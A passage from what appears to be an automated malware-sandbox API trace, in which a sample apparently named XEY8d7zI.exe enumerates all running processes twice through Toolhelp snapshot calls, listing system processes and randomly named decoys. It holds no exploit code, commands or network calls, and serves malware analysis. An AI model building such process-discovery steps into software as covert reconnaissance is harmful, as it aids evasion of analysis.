lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.316] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0100.316] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.317] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.318] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0100.319] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.320] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.321] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0100.322] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0100.323] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0100.325] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.326] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.327] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0100.328] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0100.329] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0100.330] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0100.332] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0100.428] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0100.429] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0100.430] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0100.431] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0100.432] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0100.434] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0100.435] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0100.436] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0100.437] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0100.438] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0100.439] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 
[0100.440] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0100.441] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0100.443] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0100.444] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0100.445] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.446] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0100.447] CloseHandle (hObject=0xc4) returned 1 [0100.447] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0100.452] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.453] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0100.454] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0100.454] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.455] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0100.456] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.456] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0100.457] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0100.458] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0100.459] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0100.504] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.505] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.506] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.506] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.507] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.508] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0100.508] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.510] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0100.511] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.513] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0100.515] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0100.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0100.517] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.518] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0100.521] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0100.522] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0100.523] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0100.524] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0100.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0100.527] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0100.528] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0100.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0100.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0100.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0100.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0100.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0100.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0100.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0100.537] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0100.538] Process32NextW (in: 
hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0100.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0100.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0100.608] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0100.609] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.611] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0100.612] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 